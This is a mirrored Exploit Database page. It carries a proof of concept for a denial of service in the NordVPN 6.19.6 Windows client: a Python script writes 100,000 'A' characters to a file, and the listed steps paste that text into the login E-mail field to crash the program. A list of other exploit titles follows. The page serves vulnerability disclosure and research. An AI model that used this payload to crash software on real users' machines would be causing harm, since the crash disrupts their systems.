NordVPN 6.19.6 – Denial of Service (PoC)

Exploit Database
15 阅读

作者： Alejandra Sánchez

日期： 2019-02-11
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46343/

# -*- coding: utf-8 -*-
# Exploit Title: NordVPN 6.19.6 - Denial of Service (PoC)
# Date: 07/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://nordvpn.com/
# Software Link: https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
# Version: 6.19.6
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script, it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NordVPN.exe 
# 3.- Paste clipboard in 'E-mail' field
# 4.- Write '1234' in 'Password' field
# 5.- Clic on button -> Sign In
# 6.- Crashed

buffer = "\x41" * 100000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()

last Exploits
NordVPN 6.19.6 – Denial of Service (PoC)的更多信息

Adobe Acrobat CoolType (AFDKO) – Memory Corruption in the Handling of Type 1 Font load/store Operators：
Adobe Photoshop CS6 – ‘.png’ Parsing Heap Overflow：
Publish-It 3.6d – Buffer Overflow：
Adobe Flash – ‘IExternalizable.writeExternal’ Type Confusion：
Google Chrome 4.0.249 – XML Denial of Service (PoC)：
Microsoft Windows Kernel – WindowStation Use-After-Free (MS15-061)：
Exim ESMTP 4.80 – glibc gethostbyname Denial of Service：
OpenOffice – ‘.slk’ Parsing Null Pointer：